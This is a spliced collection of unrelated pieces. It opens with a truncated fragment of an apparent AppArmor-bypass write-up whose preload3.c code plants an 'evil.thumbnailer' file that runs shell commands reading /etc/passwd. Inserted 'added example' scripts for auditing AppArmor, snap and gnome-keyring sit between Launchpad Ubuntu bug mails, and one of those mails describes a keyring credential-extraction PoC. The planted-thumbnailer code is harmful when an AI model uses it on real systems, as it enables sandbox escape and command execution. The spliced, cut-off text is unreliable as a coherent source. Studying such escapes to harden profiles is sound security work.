But of course blacklists are brittle and often trivially bypassable. For example, did you know that it is possible to override the system's thumbnailers by dropping .thumbnailer files in ~/.local/share/ ? .thumbnailer files contain command lines that will be executed by nautilus.

To demonstrate that it is possible to create .thumbnailer files from evince-thumbnailer:

user@ubuntu-18-04-vm:~$ ls -la .local/share/thumbnailers/
ls: cannot access '.local/share/thumbnailers/': No such file or directory
user@ubuntu-18-04-vm:~$ cat preload3.c
#define _GNU_SOURCE
/* include list reconstructed, as for preload2.c above */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <err.h>
#include <sys/stat.h>

__attribute__((constructor)) static void entry(void) {
  printf("constructor running from %s\n", program_invocation_name);
  if (mkdir("/home/user/.local/share/thumbnailers", 0777) && errno != EEXIST)
    err(1, "mkdir");
  FILE *f = fopen("/home/user/.local/share/thumbnailers/evil.thumbnailer", "w");
  if (!f)
    err(1, "create");
  fputs("[Thumbnailer Entry]\n", f);
  fputs("Exec=find /etc/passwd -name passwd -exec gnome-terminal -- sh -c id;cat [...]
}

As a comment in abstractions/dbus-session explains:

# This abstraction grants full session bus access. Co
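The deny-list gap the report describes, checked with an added, simplified evaluator of the quoted profile rules (not AppArmor's own matcher, and not code from the report): deny rules override allow rules, '**' crosses '/' while '*' does not, and @{HOME} expands to a constructed /home/user. Alternations, character classes, link/exec modes and the 'owner' check (all files are assumed to belong to the user) are not modelled. It shows that ~/.bashrc is blocked while the ~/.local/share/thumbnailers/ path the report uses is writable.

```python
"""Simplified AppArmor file-rule evaluator (added example) for auditing deny-lists."""
import re

HOME = "/home/user"  # constructed value for the @{HOME} variable

# Rules quoted from the profile excerpt in the report, comments included.
PROFILE = """
/usr/bin/evince-thumbnailer {
  # Lenient, but remember we still have abstractions/private-files-strict in
  # effect).
  @{HOME}/ r,
  owner @{HOME}/** rw,
  owner /media/** rw,

  # don't allow reading/updating of run control files
  deny @{HOME}/.*rc mrk,
  audit deny @{HOME}/.*rc wl,

  # bash
  deny @{HOME}/.bash* mrk,
  audit deny @{HOME}/.bash* wl,
  deny @{HOME}/.inputrc mrk,
  audit deny @{HOME}/.inputrc wl,
}
"""

# qualifiers (audit, deny, owner) then a path glob and a permission string
RULE_RE = re.compile(r"^\s*(?:(audit)\s+)?(?:(deny)\s+)?(?:(owner)\s+)?(\S+)\s+([a-zA-Z]+),\s*$")


def glob_to_regex(pattern):
    """AppArmor globbing: '**' may cross '/', '*' may not; all else is literal."""
    pattern = pattern.replace("@{HOME}", HOME)
    out, i = "", 0
    while i < len(pattern):
        if pattern.startswith("**", i):
            out += ".*"
            i += 2
        elif pattern[i] == "*":
            out += "[^/]*"
            i += 1
        else:
            out += re.escape(pattern[i])
            i += 1
    return re.compile("^" + out + "$")


def parse_rules(text):
    """Return the file rules as dicts with a deny flag, compiled pattern and permission set."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0]  # strip comments before matching
        m = RULE_RE.match(line)
        if m:
            audit, deny, owner, path, perms = m.groups()
            rules.append({"deny": deny is not None, "owner": owner is not None,
                          "pattern": glob_to_regex(path), "perms": set(perms)})
    return rules


def access_allowed(rules, path, perm):
    """Evaluate one access: any matching deny rule beats every matching allow rule."""
    allowed = False
    for rule in rules:
        if perm in rule["perms"] and rule["pattern"].match(path):
            if rule["deny"]:
                return False
            allowed = True
    return allowed


def writable_paths(rules, candidates):
    """Which candidate paths can the profile write? The audit question for a deny-list."""
    return [p for p in candidates if access_allowed(rules, p, "w")]


RULES = parse_rules(PROFILE)
CANDIDATES = [  # constructed from the paths discussed in the report
    f"{HOME}/.bashrc",                                     # on the deny-list
    f"{HOME}/.local/share/thumbnailers/evil.thumbnailer",  # not on it
    "/etc/passwd",                                         # outside every allow rule
]

if __name__ == "__main__":
    for p in CANDIDATES:
        print(f"{'WRITABLE' if access_allowed(RULES, p, 'w') else 'denied  '} {p}")
```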
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
@Christina - I suggest filing a new bug with more specifics. That said, I suspect you have a .dpkg-dist file in /etc/apparmor.d or /etc/apparmor.d/abstractions that has changes that need to be merged into your evince profile.

--
https://bugs.launchpad.net/bugs/1798091

Title: thumbnailer cannot create tempfiles (with apparmor denials)

Status in evince package in Ubuntu: Fix Released
Status in evince source package in Cosmic: Fix Released
Status in evince source package in Disco: Fix Released
Status in evince package in Debian: Fix Released

Bug description:

* Impact
Nautilus fails to generate previews for pdf files

* Test case
Download/copy a pdf, open the directory in nautilus, a preview image should be displayed

* Regression potential
Check that there are no other apparmor denials and the thumbnailer works

-

While trying to create thumbnails in a directory from within nautilus, I got:

[781429.784125] audit: type=1400 audit(1539694722.247:989): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30937 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000
[781429.940592] audit: type=1400 audit(1539694722.403:990): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30941 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000
[781430.314591] audit: type=1400 audit(1539694722.779:991): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30945 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000
[781431.283522] audit: type=1400 audit(1539694723.747:992): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30949 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000
[781431.518566] audit: type=1400 audit(1539694723.983:993): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30953 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000

ProblemType: Bug
DistroRelease: Ubuntu 18.10
Package: evince 3.30.1-1
ProcVersionSignature: Ubuntu 4.18.0-8.9-generic 4.18.7
Uname: Linux 4.18.0-8-generic x86_64
ApportVersion: 2.20.10-0ubuntu13
Architecture: amd64
CurrentDesktop: ubuntu:GNOME
Date: Tue Oct 16 14:59:00 2018
InstallationDate: Installed on 2014-06-19 (1580 days ago)
InstallationMedia: Ubuntu 14.04 LTS "Trusty Tahr" - Release amd64 (20140417)
ProcEnviron:
 TERM=xterm-256color
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=<set>
 LANG=de_DE.UTF-8
 SHELL=/bin/bash
SourcePackage: evince
UpgradeStatus: Upgraded to cosmic on 2018-10-07 (9 days ago)
[Desktop-packages] [Bug 1724793] Re: Error localization
** Package changed: ufw (Ubuntu) => language-selector (Ubuntu)

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to language-selector in Ubuntu.
https://bugs.launchpad.net/bugs/1724793

Title:
  Error localization

Status in language-selector package in Ubuntu:
  New

Bug description:
  After some manipulation of the system, the interface of the OS was in English, as were all the default startup applications. I tried to change the locale via the GUI; however, everything is on the ground.

  ---

  After some manipulation of the system, the OS interface became English, as did all the applications started by default. I tried to change the locale through the GUI, but everything there is in its place.

  locale
  LANG=ru_RU.UTF-8
  LANGUAGE=C.UTF-8
  LC_CTYPE="ru_RU.UTF-8"
  LC_NUMERIC="ru_RU.UTF-8"
  LC_TIME="ru_RU.UTF-8"
  LC_COLLATE="ru_RU.UTF-8"
  LC_MONETARY="ru_RU.UTF-8"
  LC_MESSAGES="ru_RU.UTF-8"
  LC_PAPER="ru_RU.UTF-8"
  LC_NAME="ru_RU.UTF-8"
  LC_ADDRESS="ru_RU.UTF-8"
  LC_TELEPHONE="ru_RU.UTF-8"
  LC_MEASUREMENT="ru_RU.UTF-8"
  LC_IDENTIFICATION="ru_RU.UTF-8"
  LC_ALL=ru_RU.UTF-8

  locale -a
  C
  C.UTF-8
  en_AG
  en_AG.utf8
  en_AU.utf8
  en_BW.utf8
  en_CA.utf8
  en_DK.utf8
  en_GB.utf8
  en_HK.utf8
  en_IE.utf8
  en_IN
  en_IN.utf8
  en_NG
  en_NG.utf8
  en_NZ.utf8
  en_PH.utf8
  en_SG.utf8
  en_US.utf8
  en_ZA.utf8
  en_ZM
  en_ZM.utf8
  en_ZW.utf8
  POSIX
  ru_RU.utf8
  ru_UA.utf8

  cat /etc/default/locale
  # File generated by update-locale
  LANG="ru_RU.UTF-8"
  LANGUAGE="ru:en"
  LC_NUMERIC="ru_RU.UTF-8"
  LC_TIME="ru_RU.UTF-8"
  LC_MONETARY="ru_RU.UTF-8"
  LC_PAPER="ru_RU.UTF-8"
  LC_IDENTIFICATION="ru_RU.UTF-8"
  LC_NAME="ru_RU.UTF-8"
  LC_ADDRESS="ru_RU.UTF-8"
  LC_TELEPHONE="ru_RU.UTF-8"
  LC_MEASUREMENT="ru_RU.UTF-8"

  nano ~/.bashrc
  # ~/.bashrc: executed by bash(1) for non-login shells.
  # see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
  # for examples

  #export LC_xxx=C.UTF-8
  export LC_ALL=ru_RU.UTF-8
  ...

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/language-selector/+bug/1724793/+subscriptions
[Desktop-packages] [Bug 1792835] Re: Bash completion for Inkscape does not work
The ufw bug is being tracked in bug 1775043. Removing that task.

** No longer affects: ufw (Ubuntu)

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to jackd2 in Ubuntu.
https://bugs.launchpad.net/bugs/1792835

Title:
  Bash completion for Inkscape does not work

Status in apt-xapian-index package in Ubuntu:
  New
Status in cowdancer package in Ubuntu:
  Fix Committed
Status in dpatch package in Ubuntu:
  New
Status in inkscape package in Ubuntu:
  Fix Released
Status in jackd2 package in Ubuntu:
  New

Bug description:
  Bash completion for Inkscape does not work in Ubuntu 18.04. It will for example suggest non-svg files.

  The reason seems to be that /usr/share/bash-completion/completions/inkscape uses the have() function, which is temporarily defined in /usr/share/bash-completion/bash_completion, but then unset at the end of that file.

  Workaround: Copy /usr/share/bash-completion/completions/inkscape to ~/.local/share/bash-completion/completions/inkscape and remove the uses of "have".

  The bash completion for some other commands seems to use have() too, e.g. jackd, ufw, cowbuilder, dpatch_edit_patch, and axi-cache, so bash completion for these commands will presumably not work either.

  From /usr/share/bash-completion/bash_completion:
  -
  # Backwards compatibility for compat completions that use have().
  # @deprecated should no longer be used; generally not needed with dynamically
  # loaded completions, and _have is suitable for runtime use.
  have()
  {
      unset -v have
      _have $1 && have=yes
  }
  [...]
  unset -f have
  unset have
  -

  From /usr/share/bash-completion/completions/inkscape:
  -
  [...]
  have inkscape && _inkscape()
  {
  [...]
  }
  [ "${have:-}" ] && complete -F _inkscape $filenames inkscape
  -

  System information:

  $ lsb_release -rd
  Description:    Ubuntu 18.04.1 LTS
  Release:        18.04

  $ apt-cache policy inkscape
  inkscape:
    Installed: 0.92.3-1
    Candidate: 0.92.3-1
    Version table:
   *** 0.92.3-1 500
          500 http://no.archive.ubuntu.com/ubuntu bionic/universe amd64 Packages
          100 /var/lib/dpkg/status

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apt-xapian-index/+bug/1792835/+subscriptions
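The have() problem described in this report can be checked for, and worked around, mechanically. The script below is an added example, not code from the bug report or from the bash-completion project: it lists the completion scripts in a directory that still guard on have()/$have (bash_completion defines have() for compatibility and then runs "unset -f have", so a script sourced afterwards that starts with "have inkscape && _inkscape() ..." never defines its completion function), and applies the edit the reporter suggests, dropping the guards, to a copy. The grep and sed patterns are my own and cover the two forms quoted in the report.

```shell
#!/bin/sh
# Added example, not code from the bug report or from bash-completion:
# find completion scripts that still depend on the deprecated have() helper
# and strip the guards from one script, the way the report's workaround does.

# uses_deprecated_have FILE: succeed if FILE guards on have()/$have.
uses_deprecated_have() {
    grep -Eq '(^|[^_[:alnum:]])have [[:alnum:]_.-]+ *&&|\$\{have(:-)?\}' "$1"
}

# find_have_users DIR: print the scripts under DIR that use the helper,
# i.e. the list the reporter compiled by hand (jackd, ufw, cowbuilder, ...).
find_have_users() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        if uses_deprecated_have "$f"; then printf '%s\n' "$f"; fi
    done
}

# strip_have_guards: read one completion script on stdin and write it without
# the have guards, i.e. the edit to make on the copy placed under
# ~/.local/share/bash-completion/completions/ (searched before /usr/share).
strip_have_guards() {
    sed -e 's/^have [[:alnum:]_.-]* *&& *//' \
        -e 's/^\[ "\${have:-}" ] *&& *//'
}

# Stand-alone run: scan the system directory when it exists on this machine.
dir=${1:-/usr/share/bash-completion/completions}
if [ -d "$dir" ]; then
    find_have_users "$dir"
fi
```

Run the scan first; for each file it prints, copy the file under the user completion directory and pipe it through strip_have_guards. The system file is left untouched, so the workaround survives package upgrades and disappears on its own once the packaged script is fixed.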
[Desktop-packages] [Bug 1750069] Re: [MIR] xdg-desktop-portal-gtk
Marked the xenial and bionic tasks as incomplete. Seth gave some guidance but the desktop team needs to respond on how to handle it before anything is done with the seeding.

** Changed in: xdg-desktop-portal-gtk (Ubuntu Xenial)
       Status: New => Incomplete

** Changed in: xdg-desktop-portal-gtk (Ubuntu Bionic)
       Status: New => Incomplete

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to xdg-desktop-portal-gtk in Ubuntu.
https://bugs.launchpad.net/bugs/1750069

Title:
  [MIR] xdg-desktop-portal-gtk

Status in xdg-desktop-portal-gtk package in Ubuntu:
  Fix Released
Status in xdg-desktop-portal-gtk source package in Xenial:
  Incomplete
Status in xdg-desktop-portal-gtk source package in Bionic:
  Incomplete

Bug description:
  Availability
  ============
  Actively maintained in debian and we'll sync from debian again when 0.10 is available.
  Built for all supported architectures.

  Rationale
  =========
  Required for snaps.

  Security
  ========
  No known security issues, but due to the nature of this package, a security review is probably needed.
  https://security-tracker.debian.org/tracker/source-package/xdg-desktop-portal-gtk
  https://launchpad.net/xdg-desktop-portal-gtk/+cve

  Quality assurance
  =================
  - The Desktop Packages bug team is subscribed.
  https://bugs.launchpad.net/ubuntu/+source/xdg-desktop-portal-gtk
  https://bugs.debian.org/cgi-bin/pkgreport.cgi?src=xdg-desktop-portal-gtk
  https://github.com/flatpak/xdg-desktop-portal-gtk/issues

  Dependencies
  ============
  No universe binary dependencies

  Standards compliance
  ====================
  4.1.3
  debhelper compat 10, dh 7 style simple rules

  Maintenance
  ===========
  - Actively developed upstream. Last release was 0.10, this week.
  https://github.com/flatpak/xdg-desktop-portal-gtk/commits/master
  Well-maintained in Debian by Simon McVittie (Debian's Flatpak maintainer). Team-maintained.
  https://salsa.debian.org/debian/xdg-desktop-portal-gtk

  Background information
  ======================
  This is needed to make xdg-desktop-portal useful in Ubuntu Desktop.
  See xdg-desktop-portal MIR bug LP: #1749672

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/xdg-desktop-portal-gtk/+bug/1750069/+subscriptions
[Desktop-packages] [Bug 1643910] Re: BAMF_DESKTOP_FILE_HINT not set in correct place for unity7
Actually, there is https://bugs.launchpad.net/bamf/+bug/1747802 which is fixed. I checked the code and this should be resolved. Marking as fixed.

** Changed in: bamf (Ubuntu)
       Status: Triaged => Fix Released

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to bamf in Ubuntu.
https://bugs.launchpad.net/bugs/1643910

Title:
  BAMF_DESKTOP_FILE_HINT not set in correct place for unity7

Status in Snappy:
  Triaged
Status in bamf package in Ubuntu:
  Fix Released

Bug description:
  Occasionally when I pin items to the Unity7 launcher, the BAMF code (as I'm told) incorrectly matches to /snap/app/revision/

  This is a security issue because the Exec= line points to /snap/app/revision/... which bypasses snap run (/snap/bin/...) and therefore snap-confine.

  I'm told by Marcus (aka, 3v1n0 aka Trevinho) that this is because BAMF_DESKTOP_FILE_HINT is not exported by snap env and instead only injected in the desktop file that is created in /var/lib/snapd/desktop/applications upon snap install. This means that the wrong Exec= (ie, where it points to the binary) may occur in two places:

  1. when launching /snap/bin/... from the command line
  2. when something in /var/lib/snapd/desktop/applications/*.desktop doesn't match properly

  In both cases, the initial launch is fine, but pinning the icon to the launcher results in the wrong entry in the Exec= line and launching from this pinned launcher entry after is unconfined.

  You can check by doing:
  1. launch application from the dash
  2. run sudo aa-status and see if it is launched under confinement
  3. pin the icon that is in the launcher
  4. close the application, then launch from the pinned icon
  5. run sudo aa-status and see if it is launched under confinement

  This doesn't happen all the time. For example, vlc seems to work fine both from the command line and from launching via a pinned launcher entry. chrome-test on the other hand doesn't seem to work with either.

  Related https://github.com/snapcore/snapd/pull/1580 -- puts BAMF_DESKTOP_FILE_HINT in the desktop file instead of in the environment, but Marco requested that this change (https://github.com/snapcore/snapd/pull/1580#issuecomment-234546220). https://trello.com/c/xP1hN3BF/152-improve-desktop-file-support-by-adding-a-new-bamf-desktop-file-hint-environment-hint also discussed this issue, but the card is archived and therefore it won't be worked on.

  I'm having trouble finding a simple reproducer (other than chrome-test) but am told by Marco that the BAMF matching will always work if BAMF_DESKTOP_FILE_HINT in the process' environment always points to the desktop file in /var/lib/snapd/desktop/applications. I will continue to look for a simple reproducer.

To manage notifications about this bug go to:
https://bugs.launchpad.net/snappy/+bug/1643910/+subscriptions
[Desktop-packages] [Bug 1643910] Re: BAMF_DESKTOP_FILE_HINT not set in correct place for unity7
Is there any more progress on this?

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to bamf in Ubuntu.
https://bugs.launchpad.net/bugs/1643910

Title:
  BAMF_DESKTOP_FILE_HINT not set in correct place for unity7

Status in Snappy:
  Triaged
Status in bamf package in Ubuntu:
  Triaged
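The five-step aa-status check in bug 1643910 comes down to two artefacts: the Exec= line of the pinned .desktop entry, and the AppArmor label of the process it starts. The script below is an added example, not code from the bug report, snapd or bamf: check_desktop_exec flags an entry whose Exec= runs the binary straight from /snap/<name>/<rev>/ instead of through /snap/bin/ (the bypass of snap-confine the report describes), and confinement_of reads a live process's label from /proc, which is what "sudo aa-status" reports, without needing root for your own processes. The snapd-style Exec= line with its env prefix and the revision number 123 are constructed sample data; the /proc attr paths are the kernel's AppArmor interface.

```shell
#!/bin/sh
# Added example for bug 1643910 (not code from the bug, snapd or bamf):
#   check_desktop_exec  - flag a .desktop Exec= that launches a snap binary
#                         directly from /snap/<name>/<rev>/..., bypassing
#                         /snap/bin and therefore snap-confine;
#   confinement_of PID  - report the AppArmor label of a running process.

# check_desktop_exec: read a .desktop file on stdin. Prints "ok" when every
# Exec= line either goes through /snap/bin/ or is not a snap path at all;
# otherwise prints "unconfined-exec <program>" for each offending line.
check_desktop_exec() {
    awk '
    /^Exec=/ {
        n = split(substr($0, 6), w, " ")
        prog = ""
        for (i = 1; i <= n; i++) {
            # skip an "env VAR=value ..." prefix; snapd-generated entries use
            # one to pass BAMF_DESKTOP_FILE_HINT to the launched process
            if (w[i] == "env" || w[i] ~ /^[A-Za-z_][A-Za-z0-9_]*=/) continue
            prog = w[i]; break
        }
        if (prog ~ "^/snap/bin/") next
        if (prog ~ "^/snap/[^/]+/[^/]+/") { print "unconfined-exec " prog; bad = 1 }
    }
    END { if (!bad) print "ok" }'
}

# parse_label LABEL: turn the contents of /proc/PID/attr/current, e.g.
# "snap.vlc.vlc (enforce)", into "confined <profile> <mode>" or "unconfined".
parse_label() {
    case $1 in
        unconfined) echo unconfined ;;
        *" ("*")")
            profile=${1% *}
            mode=${1##* }
            mode=${mode#"("}
            echo "confined $profile ${mode%")"}" ;;
        *) echo "unknown $1" ;;
    esac
}

# confinement_of PID: read the label of a live process. Newer kernels expose
# it under attr/apparmor/, older ones under attr/; own processes need no root.
confinement_of() {
    f=/proc/$1/attr/apparmor/current
    [ -r "$f" ] || f=/proc/$1/attr/current
    if [ -r "$f" ]; then
        parse_label "$(cat "$f")"
    else
        echo "unknown (no AppArmor attr for pid $1)"
    fi
}

# Stand-alone run over constructed entries: the snapd-style form (hint passed
# via env, launch through /snap/bin) versus the broken form the report describes.
printf 'Exec=env BAMF_DESKTOP_FILE_HINT=/var/lib/snapd/desktop/applications/vlc_vlc.desktop /snap/bin/vlc %%U\n' | check_desktop_exec
printf 'Exec=/snap/vlc/123/usr/bin/vlc %%U\n' | check_desktop_exec
confinement_of $$
```

To apply it to the report's reproducer: run check_desktop_exec over the entry Unity wrote for the pinned icon, and confinement_of over the PID of the application started from that icon. An "unconfined-exec" result together with an "unconfined" label is the failure mode the report calls a security issue, since the snap's profile is never attached.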
[Desktop-packages] [Bug 1780365] Re: Credentials located in gnome-keyring can be compromised easily
Thank you for reporting this bug. The access via DBus when the keyring is unlocked is a well-known issue and the design of the feature as explained when reading the entirety of https://wiki.ubuntu.com/SecurityTeam/FAQ#gnome-keyring. Users who prefer to be prompted can choose to use a separate keyring than the one that is automatically unlocked upon successful login.

That said, I'm not clear if you are saying that the keyring is not locked during screensaver or logout. If either of these is the case, that sounds like a bug. Can you confirm and detail your methodology?

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-keyring in Ubuntu.
https://bugs.launchpad.net/bugs/1780365

Title:
  Credentials located in gnome-keyring can be compromised easily

Status in gnome-keyring package in Ubuntu:
  New

Bug description:
  Dear all,

  I figured out that login credentials, located in gnome-keyring, can be easily compromised.

  Linux based on Gnome basically uses ‘gnome-keyring’ as its backend to store login credentials in a secure manner. Specifically, google-chrome browser, network-manager and gnome-online-accounts use this as a backend solution to store login credentials. To use this, authentication is performed together with gnome-keyring as part of ‘pam-gnome-keyring.so’. At this point, it remains unlocked until the system is shut down or logged out.

  In this state, a simple program that uses the ‘Secret Service API’ call and its ‘D-Bus’ interface can easily retrieve login credentials from those gnome-keyring without any privilege escalation, listening into the X events going to another window, or installation of an application on the target computer. (please check PoC source https://github.com/sungjungk/keyring_crack and video https://youtu.be/Do4E9ZQaPck)

  The issue is different from the content shown on the Ubuntu Security FAQ and GnomeKeyring Wiki [1][2]. It was even said that “PAM session is closed via the screensaver, all keyrings are locked, and the ‘login’ keyring is unlocked upon successful authentication to the screensaver”. After trying to crack the keyring, it was far from what they really thought. It is no different than a plain text file for login credentials somewhere on disk.

  To deal with this, the root cause of the problem is that the ‘Secret Service API’ can be easily accessed by anyone on the DBus API. If access control is enabled, only well-known? or authorized processes, such as google-chrome, network-manager, and gnome-online-accounts, will be able to access the login credentials.

  DBus originally provides a capability that is essential to access control of the DBus API by defining a security policy in the form of a *.conf file. Currently, various services based on the DBus interface are employing the above security policy feature to perform access control. For example, login/system related functions are controlled from ‘login1’ and its security policy is described in “org.freedesktop.login1.conf”. (see https://github.com/systemd/systemd/blob/master/src/core/org.freedesktop.systemd1.conf)

  Likewise, why don’t we try adopting the access control of the secret service API into the gnome-keyring environment? Due to the fact that a process with root privilege can access the “.conf” file, an approved program may only update the target file during the installation process.

  Here is a really simple ‘org.freedesktop.secrets.conf’ example.
  = http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd";> =

  Many Thanks!!

  [1] https://wiki.ubuntu.com/SecurityTeam/FAQ#Contact
  [2] https://wiki.gnome.org/Projects/GnomeKeyring/SecurityPhilosophy

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: gnome-keyring 3.28.0.2-1ubuntu1
  ProcVersionSignature: Ubuntu 4.15.0-20.21-generic 4.15.17
  Uname: Linux 4.15.0-20-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.2
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Thu Jul 5 17:45:22 2018
  InstallationDate: Installed on 2018-07-06 (0 days ago)
  InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Release amd64 (20180426)
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: gnome-keyring
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/gnome-keyring/+bug/1780365/+subscriptions
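The question the Security Team's reply asks, whether the keyring really is locked while the screensaver is active or after logout, can be answered from the Secret Service API itself rather than by trying to read items. The script below is an added example, not code from the report, from gnome-keyring or from the Ubuntu Security Team: it reads a collection's Locked property over the session bus with gdbus and can ask the service to lock a collection. The bus name org.freedesktop.secrets and the org.freedesktop.Secret.* interfaces are the public Secret Service API; the collection path .../collection/login is gnome-keyring's default and is assumed here.

```shell
#!/bin/sh
# Added example for bug 1780365 (not code from the report or gnome-keyring):
# report whether a Secret Service collection is locked, and lock it on demand.
# Assumes a session bus, the gdbus tool from GLib, and gnome-keyring's
# default collection path /org/freedesktop/secrets/collection/<name>.

SECRETS_DEST=org.freedesktop.secrets
SECRETS_ROOT=/org/freedesktop/secrets

# parse_locked REPLY: reduce gdbus's printed reply "(<true>,)" / "(<false>,)"
# for the boolean Locked property to "locked" / "unlocked".
parse_locked() {
    case $1 in
        '(<true>,)')  echo locked ;;
        '(<false>,)') echo unlocked ;;
        *)            echo "unexpected reply: $1" ;;
    esac
}

# collection_state NAME: read org.freedesktop.Secret.Collection.Locked for the
# collection called NAME (e.g. "login"). Run it while the screen is locked,
# from a terminal opened beforehand or over ssh, to check the reply's claim.
collection_state() {
    out=$(gdbus call --session --dest "$SECRETS_DEST" \
        --object-path "$SECRETS_ROOT/collection/$1" \
        --method org.freedesktop.DBus.Properties.Get \
        org.freedesktop.Secret.Collection Locked 2>&1) \
        || { echo "query failed: $out"; return 1; }
    parse_locked "$out"
}

# lock_collection NAME: ask the service to lock NAME now, which is what the
# screensaver integration is documented to do for "login". Prints the reply:
# the list of objects that were locked and a prompt path ("/" if none).
lock_collection() {
    gdbus call --session --dest "$SECRETS_DEST" \
        --object-path "$SECRETS_ROOT" \
        --method org.freedesktop.Secret.Service.Lock \
        "['$SECRETS_ROOT/collection/$1']"
}

# Stand-alone run: report the login keyring's state when a session bus is
# reachable; otherwise exercise the parser on a constructed reply.
if command -v gdbus >/dev/null 2>&1 && [ -n "${DBUS_SESSION_BUS_ADDRESS:-}" ]; then
    collection_state login || true
else
    parse_locked '(<false>,)'
fi
```

"unlocked" for the login collection during a normal session is the documented design the reply points to, and any process on the session bus can then read its items; "unlocked" while the screen is locked, or after logout, is the case the reply says would be a bug. Secrets that should require a prompt belong in a separate collection that is not unlocked by PAM at login, which is the mitigation the reply offers.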
[Desktop-packages] [Bug 1802911] Re: [snap] LibreOffice 6.1.3.2 (90) doesn't launch
FYI, '@{PROC}/version r,' is in the default apparmor template.

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to libreoffice in Ubuntu.
https://bugs.launchpad.net/bugs/1802911

Title:
  [snap] LibreOffice 6.1.3.2 (90) doesn't launch

Status in libreoffice package in Ubuntu:
  Invalid

Bug description:
  LibreOffice doesn't launch on 6.1.3.2 (90) in `candidate` on core 16-2.36.1+git1007.f72779e (5920) in `edge`, it just hangs, with no Terminal output, but has the following denials in `journalctl -f`:

  ```
  Nov 12 12:38:19 adam-thinkpad-t430 audit[31984]: AVC apparmor="DENIED" operation="open" profile="snap-update-ns.libreoffice" name="/proc/version" pid=31984 comm="3" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  Nov 12 12:38:19 adam-thinkpad-t430 kernel: audit: type=1400 audit(1542026299.589:542): apparmor="DENIED" operation="open" profile="snap-update-ns.libreoffice" name="/proc/version" pid=31984 comm="3" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
  ```

  ```
  $ snap info libreoffice
  tracking:     candidate
  refresh-date: 6 days ago, at 08:50 GMT
  channels:
    stable:    6.1.2.1 (86) 501MB -
    candidate: 6.1.3.2 (90) 507MB -  <
    beta:      ↑
    edge:      ↑
  installed:   6.1.3.2 (90) 507MB -

  $ snap version
  snap    2.36.1+git1007.f72779e~ubuntu16.04.1
  snapd   2.36.1+git1007.f72779e~ubuntu16.04.1
  series  16
  ubuntu  18.10
  kernel  4.18.0-11-generic

  $ snap info core
  tracking:     edge
  refresh-date: today at 12:08 GMT
  channels:
    stable:    16-2.35.5 (5742) 92MB -
    candidate: 16-2.35.5 (5742) 92MB -
    beta:      16-2.36.1 (5897) 92MB -
    edge:      16-2.36.1+git1007.f72779e (5920) 92MB -  <
  installed:   16-2.36.1+git1007.f72779e (5920) 92MB core
  ```

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libreoffice/+bug/1802911/+subscriptions
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
** Also affects: evince (Ubuntu Disco)
   Importance: High
     Assignee: Sebastien Bacher (seb128)
       Status: Fix Released

** Changed in: evince (Ubuntu Disco)
       Status: Fix Released => Triaged

https://bugs.launchpad.net/bugs/1798091

Title:
  thumbnailer cannot create tempfiles (with apparmor denials)

Status in evince package in Ubuntu:
  Triaged
Status in evince source package in Cosmic:
  Fix Committed
Status in evince source package in Disco:
  Triaged
Status in evince package in Debian:
  Unknown
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
Uploaded 3.30.1-1ubuntu1.2 to cosmic-proposed.

** Changed in: evince (Ubuntu)
       Status: In Progress => Fix Committed

https://bugs.launchpad.net/bugs/1798091

Title:
  thumbnailer cannot create tempfiles (with apparmor denials)

Status in evince package in Ubuntu:
  Fix Committed
Status in evince package in Debian:
  Unknown
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
I'll be updating a new version on top of Seb's changes. Marking back to In Progress for now.

** Changed in: evince (Ubuntu)
       Status: Fix Committed => In Progress

https://bugs.launchpad.net/bugs/1798091

Title:
  thumbnailer cannot create tempfiles (with apparmor denials)

Status in evince package in Ubuntu:
  In Progress
Status in evince package in Debian:
